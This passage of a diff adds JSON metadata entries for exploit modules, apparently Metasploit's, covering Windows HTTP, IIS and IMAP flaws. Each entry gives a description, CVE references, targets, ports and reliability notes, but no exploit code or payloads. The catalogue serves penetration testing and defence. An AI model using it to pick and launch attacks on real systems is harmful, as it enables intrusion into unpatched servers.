Due to size constraints, this module uses\n the Egghunter technique.", + "references": [ + "CVE-2007-5067", + "OSVDB-40594", + "OSVDB-40595", + "BID-25772", + "EDB-4450" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "xigui32.exe Universal", + "xitami.exe Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/xitami_if_mod_since.rb", + "is_install_path": true, + "ref_name": "windows/http/xitami_if_mod_since", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zentao_pro_rce": { + "name": "ZenTao Pro 8.8.2 Remote Code Execution", + "fullname": "exploit/windows/http/zentao_pro_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-06-20", + "type": "exploit", + "author": [ + "Daniel Monzón", + "Melvin Boers", + "Erik Wynter" + ], + "description": "This module exploits a command injection vulnerability in ZenTao Pro\n 8.8.2 and earlier versions in order to execute arbitrary commands with\n SYSTEM privileges.\n\n The module first attempts to authenticate to the ZenTao dashboard. It\n then tries to execute the payload by submitting fake repositories via\n the 'Repo Create' function that is accessible from the dashboard via\n CI>Repo. More precisely, the module sends HTTP POST requests to\n '/pro/repo-create.html' that inject commands in the vulnerable 'path'\n parameter which corresponds to the 'Client Path' input field.\n\n Valid credentials for a ZenTao admin account are required. 
This module\n has been successfully tested against ZenTao 8.8.1 and 8.8.2 running on\n Windows 10 (XAMPP server).", + "references": [ + "EDB-48633", + "CVE-2020-7361" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (x86)", + "Windows (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/zentao_pro_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/zentao_pro_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zenworks_assetmgmt_uploadservlet": { + "name": "Novell ZENworks Asset Management Remote Execution", + "fullname": "exploit/windows/http/zenworks_assetmgmt_uploadservlet", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-11-02", + "type": "exploit", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a path traversal flaw in Novell ZENworks Asset Management\n 7.5. 
By exploiting the CatchFileServlet, an attacker can upload a malicious file\n outside of the MalibuUploadDirectory and then make a secondary request that allows\n for arbitrary code execution.", + "references": [ + "CVE-2011-2653", + "OSVDB-77583", + "BID-50966", + "ZDI-11-342", + "URL-http://download.novell.com/Download?buildid=hPvHtXeNmCU~" + ], + "platform": "Java", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Java Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/zenworks_assetmgmt_uploadservlet.rb", + "is_install_path": true, + "ref_name": "windows/http/zenworks_assetmgmt_uploadservlet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zenworks_uploadservlet": { + "name": "Novell ZENworks Configuration Management Remote Execution", + "fullname": "exploit/windows/http/zenworks_uploadservlet", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-03-30", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n and then make a secondary request that allows for arbitrary code execution.", + "references": [ + "CVE-2010-5324", + "OSVDB-63412", + "BID-39114", + "ZDI-10-078", + "URL-http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html", + "URL-http://www.novell.com/support/kb/doc.php?id=7005573" + ], + "platform": "Java,Linux,Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + 
"Java Universal", + "Windows x86", + "Linux x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/zenworks_uploadservlet.rb", + "is_install_path": true, + "ref_name": "windows/http/zenworks_uploadservlet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/zoho_password_manager_pro_xml_rpc_rce": { + "name": "Zoho Password Manager Pro XML-RPC Java Deserialization", + "fullname": "exploit/windows/http/zoho_password_manager_pro_xml_rpc_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-24", + "type": "exploit", + "author": [ + "Vinicius", + "Y4er", + "Grant Willcox" + ], + "description": "This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro\n before 12101 and PAM360 before 5510. Unauthenticated attackers can send a\n crafted XML-RPC request containing malicious serialized data to /xmlrpc to\n gain RCE as the SYSTEM user.", + "references": [ + "CVE-2022-35405", + "URL-https://xz.aliyun.com/t/11578", + "URL-https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html", + "URL-https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm" + ], + "platform": "Windows", + "arch": "cmd, x64", + "rport": 7272, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows Command", + "Windows Powershell" + ], + "mod_time": "2022-08-02 14:27:27 +0000", + "path": "/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/zoho_password_manager_pro_xml_rpc_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + 
"repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ibm/ibm_was_dmgr_java_deserialization_rce": { + "name": "IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution", + "fullname": "exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-05-15", + "type": "exploit", + "author": [ + "b0yd" + ], + "description": "This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.\n NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.", + "references": [ + "CVE-2019-4279", + "URL-https://www-01.ibm.com/support/docview.wss?uid=ibm10883628" + ], + "platform": "Windows", + "arch": "", + "rport": 11006, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Binary", + "CMD" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ibm/ibm_was_dmgr_java_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/ibm/ibm_was_dmgr_java_deserialization_rce", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/iis/iis_webdav_scstoragepathfromurl": { + "name": "Microsoft IIS WebDav ScStoragePathFromUrl Overflow", + "fullname": "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "aliases": [], + "rank": 0, + "disclosure_date": "2017-03-26", + "type": "exploit", + "author": [ + "Zhiniang Peng", + "Chen Wu", + "Dominic Chell ", + "firefart", + "zcgonvh ", + "Rich Whitcroft", + "Lincoln" + ], + "description": "Buffer overflow in the ScStoragePathFromUrl function\n in the WebDAV service in Internet Information Services (IIS) 6.0\n in Microsoft Windows Server 2003 R2 allows remote attackers to\n execute 
arbitrary code via a long header beginning with\n \"If: " + ], + "description": "This module can be used to execute a payload on IIS servers that\n have world-writeable directories. The payload is uploaded as an ASP\n script via a WebDAV PUT request.\n\n The target IIS machine must meet these conditions to be considered\n as exploitable: It allows 'Script resource access', Read and Write\n permission, and supports ASP.", + "references": [ + "OSVDB-397", + "BID-12141" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2019-05-22 09:05:56 +0000", + "path": "/modules/exploits/windows/iis/iis_webdav_upload_asp.rb", + "is_install_path": true, + "ref_name": "windows/iis/iis_webdav_upload_asp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms01_023_printer": { + "name": "MS01-023 Microsoft IIS 5.0 Printer Host Header Overflow", + "fullname": "exploit/windows/iis/ms01_023_printer", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-05-01", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in the request processor of the\n Internet Printing Protocol ISAPI module in IIS. 
This module\n works against Windows 2000 Server and Professional SP0-SP1.\n\n If the service stops responding after a successful compromise,\n run the exploit a couple more times to completely kill the\n hung process.", + "references": [ + "CVE-2001-0241", + "OSVDB-3323", + "BID-2674", + "MSB-MS01-023", + "URL-https://seclists.org/lists/bugtraq/2001/May/0005.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP0-SP1 (Arabic)", + "Windows 2000 SP0-SP1 (Czech)", + "Windows 2000 SP0-SP1 (Chinese)", + "Windows 2000 SP0-SP1 (Dutch)", + "Windows 2000 SP0-SP1 (English)", + "Windows 2000 SP0-SP1 (French)", + "Windows 2000 SP0-SP1 (Finnish)", + "Windows 2000 SP0-SP1 (German)", + "Windows 2000 SP0-SP1 (Korean)", + "Windows 2000 SP0-SP1 (Hungarian)", + "Windows 2000 SP0-SP1 (Italian)", + "Windows 2000 SP0-SP1 (Portuguese)", + "Windows 2000 SP0-SP1 (Spanish)", + "Windows 2000 SP0-SP1 (Swedish)", + "Windows 2000 SP0-SP1 (Turkish)", + "Windows 2000 Pro SP0 (Greek)", + "Windows 2000 Pro SP1 (Greek)" + ], + "mod_time": "2022-07-09 01:36:10 +0000", + "path": "/modules/exploits/windows/iis/ms01_023_printer.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_023_printer", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms01_026_dbldecode": { + "name": "MS01-026 Microsoft IIS/PWS CGI Filename Double Decode Command Execution", + "fullname": "exploit/windows/iis/ms01_026_dbldecode", + "aliases": [], + "rank": 600, + "disclosure_date": "2001-05-15", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module will 
execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n This module has been tested successfully on:\n\n Windows 2000 Professional (SP0) (EN);\n Windows 2000 Professional (SP1) (AR);\n Windows 2000 Professional (SP1) (CZ);\n Windows 2000 Server (SP0) (FR);\n Windows 2000 Server (SP1) (EN); and\n Windows 2000 Server (SP1) (SE).\n\n Note: This module will leave a Metasploit payload exe in the IIS scripts directory.", + "references": [ + "CVE-2001-0333", + "OSVDB-556", + "BID-2708", + "MSB-MS01-026", + "URL-http://marc.info/?l=bugtraq&m=98992056521300&w=2" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows (Dropper)", + "Windows (Command)" + ], + "mod_time": "2022-07-03 18:22:55 +0000", + "path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_026_dbldecode", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/iis/ms01_033_idq": { + "name": "MS01-033 Microsoft IIS 5.0 IDQ Path Overflow", + "fullname": "exploit/windows/iis/ms01_033_idq", + "aliases": [], + "rank": 400, + "disclosure_date": "2001-06-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the IDQ ISAPI handler for\n Microsoft Index Server.", + "references": [ + "CVE-2001-0500", + "OSVDB-568", + "MSB-MS01-033", + "BID-2880" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro 
English SP0", + "Windows 2000 Pro English SP1-SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/iis/ms01_033_idq.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms01_033_idq", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms02_018_htr": { + "name": "MS02-018 Microsoft IIS 4.0 .HTR Path Overflow", + "fullname": "exploit/windows/iis/ms02_018_htr", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-04-10", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "This exploits a buffer overflow in the ISAPI ISM.DLL used to\n process HTR scripting in IIS 4.0. This module works against\n Windows NT 4 Service Packs 3, 4, and 5. The server will\n continue to process requests until the payload being\n executed has exited. If you've set EXITFUNC to 'seh', the\n server will continue processing requests, but you will have\n trouble terminating a bind shell. 
If you set EXITFUNC to\n thread, the server will crash upon exit of the bind shell.\n The payload is alpha-numerically encoded without a NOP sled\n because otherwise the data gets mangled by the filters.", + "references": [ + "CVE-1999-0874", + "OSVDB-3325", + "BID-307", + "URL-http://www.eeye.com/html/research/advisories/AD19990608.html", + "MSB-MS02-018" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows NT 4.0 SP3", + "Windows NT 4.0 SP4", + "Windows NT 4.0 SP5" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/iis/ms02_018_htr.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms02_018_htr", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms02_065_msadc": { + "name": "MS02-065 Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow", + "fullname": "exploit/windows/iis/ms02_065_msadc", + "aliases": [], + "rank": 300, + "disclosure_date": "2002-11-02", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module can be used to execute arbitrary code on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service. The service is\n exploitable even when RDS is configured to deny remote connections\n (handsafe.reg). The service is vulnerable to a heap overflow where\n the RDS DataStub 'Content-Type' string is overly long. 
Microsoft Data\n Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable.", + "references": [ + "OSVDB-14502", + "BID-6214", + "CVE-2002-1142", + "MSB-MS02-065", + "URL-http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0082.html" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 Pro SP0-SP3 (English)", + "Windows 2000 Pro SP0 (Korean)", + "Windows 2000 Pro SP0 (Dutch)", + "Windows 2000 Pro SP0 (Finnish)", + "Windows 2000 Pro SP0 (Turkish)", + "Windows 2000 Pro SP0-SP1 (Greek)", + "Windows 2000 Pro SP1 (Arabic)", + "Windows 2000 Pro SP1 (Czech)", + "Windows 2000 Pro SP2 (French)", + "Windows 2000 Pro SP2 (Portuguese)" + ], + "mod_time": "2022-07-15 00:15:56 +0000", + "path": "/modules/exploits/windows/iis/ms02_065_msadc.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms02_065_msadc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/ms03_007_ntdll_webdav": { + "name": "MS03-007 Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow", + "fullname": "exploit/windows/iis/ms03_007_ntdll_webdav", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-05-30", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits a buffer overflow in NTDLL.dll on Windows 2000\n through the SEARCH WebDAV method in IIS. This particular\n module only works against Windows 2000. 
It should have a\n reasonable chance of success against SP0 to SP3.", + "references": [ + "CVE-2003-0109", + "OSVDB-4467", + "BID-7116", + "PACKETSTORM-30939", + "MSB-MS03-007" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Brute Force" + ], + "mod_time": "2022-07-07 20:31:57 +0000", + "path": "/modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb", + "is_install_path": true, + "ref_name": "windows/iis/ms03_007_ntdll_webdav", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/iis/msadc": { + "name": "MS99-025 Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution", + "fullname": "exploit/windows/iis/msadc", + "aliases": [], + "rank": 600, + "disclosure_date": "1998-07-17", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module can be used to execute arbitrary commands on IIS servers\n that expose the /msadc/msadcs.dll Microsoft Data Access Components\n (MDAC) Remote Data Service (RDS) DataFactory service using VbBusObj\n or AdvancedDataFactory to inject shell commands into Microsoft Access\n databases (MDBs), MSSQL databases and ODBC/JET Data Source Name (DSN).\n Based on the msadcs.pl v2 exploit by Rain.Forest.Puppy, which was actively\n used in the wild in the late Ninties. MDAC versions affected include MDAC\n 1.5, 2.0, 2.0 SDK, 2.1 and systems with the MDAC Sample Pages for RDS\n installed, and NT4 Servers with the NT Option Pack installed or upgraded\n 2000 systems often running IIS3/4/5 however some vulnerable installations\n can still be found on newer Windows operating systems. 
Note that newer\n releases of msadcs.dll can still be abused however by default remote\n connections to the RDS is denied. Consider using VERBOSE if you're unable\n to successfully execute a command, as the error messages are detailed\n and useful for debugging. Also set NAME to obtain the remote hostname,\n and METHOD to use the alternative VbBusObj technique.", + "references": [ + "OSVDB-272", + "BID-529", + "CVE-1999-1011", + "MSB-MS98-004", + "MSB-MS99-025" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/iis/msadc.rb", + "is_install_path": true, + "ref_name": "windows/iis/msadc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/imap/eudora_list": { + "name": "Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow", + "fullname": "exploit/windows/imap/eudora_list", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-12-20", + "type": "exploit", + "author": [ + "MC ", + "jduck " + ], + "description": "This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n particular vulnerability.\n\n NOTE: The service does NOT restart automatically by default. 
You may be limited to\n only one attempt, so choose wisely!", + "references": [ + "CVE-2005-4267", + "OSVDB-22097", + "BID-15980" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "WorldMail 3 Version 6.1.19.0", + "WorldMail 3 Version 6.1.20.0", + "WorldMail 3 Version 6.1.22.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/eudora_list.rb", + "is_install_path": true, + "ref_name": "windows/imap/eudora_list", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/imail_delete": { + "name": "IMail IMAP4D Delete Overflow", + "fullname": "exploit/windows/imap/imail_delete", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-12", + "type": "exploit", + "author": [ + "spoonm " + ], + "description": "This module exploits a buffer overflow in the 'DELETE'\n command of the IMail IMAP4D service. 
This vulnerability\n can only be exploited with a valid username and password.\n This flaw was patched in version 8.14.", + "references": [ + "CVE-2004-1520", + "OSVDB-11838", + "BID-11675" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP sp0 comctl32.dll" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/imail_delete.rb", + "is_install_path": true, + "ref_name": "windows/imap/imail_delete", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/ipswitch_search": { + "name": "Ipswitch IMail IMAP SEARCH Buffer Overflow", + "fullname": "exploit/windows/imap/ipswitch_search", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n verb. 
By sending an overly long string, an attacker can overwrite the\n buffer and control program execution.\n In order for this module to be successful, the IMAP user must have at least one\n message.", + "references": [ + "CVE-2007-3925", + "OSVDB-36219", + "BID-24962" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/ipswitch_search.rb", + "is_install_path": true, + "ref_name": "windows/imap/ipswitch_search", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_login": { + "name": "MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_login", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-12-11", + "type": "exploit", + "author": [ + "MC " + ], + "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the Login command.", + "references": [ + "CVE-2006-6423", + "OSVDB-32125", + "BID-21492" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 2.35 Pro", + "MailEnable 2.34 Pro" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_login.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_login", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_status": { + "name": "MailEnable IMAPD (1.54) STATUS Request Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_status", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-07-13", + 
"type": "exploit", + "author": [ + "MC " + ], + "description": "MailEnable's IMAP server contains a buffer overflow\n vulnerability in the STATUS command. With proper\n credentials, this could allow for the execution of arbitrary\n code.", + "references": [ + "CVE-2005-2278", + "OSVDB-17844", + "BID-14243", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=19193" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 1.54 Pro Universal", + "Windows XP Pro SP0/SP1 English", + "Windows 2000 Pro English ALL", + "Windows 2003 Server English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_status.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_status", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mailenable_w3c_select": { + "name": "MailEnable IMAPD W3C Logging Buffer Overflow", + "fullname": "exploit/windows/imap/mailenable_w3c_select", + "aliases": [], + "rank": 500, + "disclosure_date": "2005-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. 
MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.", + "references": [ + "CVE-2005-3155", + "OSVDB-19842", + "BID-15006" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MailEnable 1.54 Pro Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mailenable_w3c_select.rb", + "is_install_path": true, + "ref_name": "windows/imap/mailenable_w3c_select", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mdaemon_cram_md5": { + "name": "Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow", + "fullname": "exploit/windows/imap/mdaemon_cram_md5", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-11-12", + "type": "exploit", + "author": [ + "Unknown" + ], + "description": "This module exploits a buffer overflow in the CRAM-MD5\n authentication of the MDaemon IMAP service. 
This\n vulnerability was discovered by Muts.", + "references": [ + "CVE-2004-1520", + "OSVDB-11838", + "BID-11675" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MDaemon IMAP 8.0.3 Windows XP SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mdaemon_cram_md5.rb", + "is_install_path": true, + "ref_name": "windows/imap/mdaemon_cram_md5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mdaemon_fetch": { + "name": "MDaemon 9.6.4 IMAPD FETCH Buffer Overflow", + "fullname": "exploit/windows/imap/mdaemon_fetch", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-03-13", + "type": "exploit", + "author": [ + "Jacopo Cervini", + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n account credentials are required. 
Credit to Matteo Memelli", + "references": [ + "CVE-2008-1358", + "OSVDB-43111", + "BID-28245", + "EDB-5248" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MDaemon Version 9.6.4" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mdaemon_fetch.rb", + "is_install_path": true, + "ref_name": "windows/imap/mdaemon_fetch", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercur_imap_select_overflow": { + "name": "Mercur v5.0 IMAP SP3 SELECT Buffer Overflow", + "fullname": "exploit/windows/imap/mercur_imap_select_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-03-17", + "type": "exploit", + "author": [ + "Jacopo Cervini " + ], + "description": "Mercur v5.0 IMAP server is prone to a remotely exploitable\n stack-based buffer overflow vulnerability. 
This issue is due\n to a failure of the application to properly bounds check\n user-supplied data prior to copying it to a fixed size memory buffer.\n Credit to Tim Taylor for discover the vulnerability.", + "references": [ + "CVE-2006-1255", + "OSVDB-23950", + "BID-17138" + ], + "platform": "Windows", + "arch": "", + "rport": 143, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Server SP4 English", + "Windows 2000 Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/imap/mercur_imap_select_overflow.rb", + "is_install_path": true, + "ref_name": "windows/imap/mercur_imap_select_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/imap/mercur_login": { + "name": "Mercur Messaging 2005 IMAP Login Buffer Overflow", + "fullname": "exploit/windows/imap/mercur_login", + "aliases": [], + "rank": 200, + "disclosure_date": 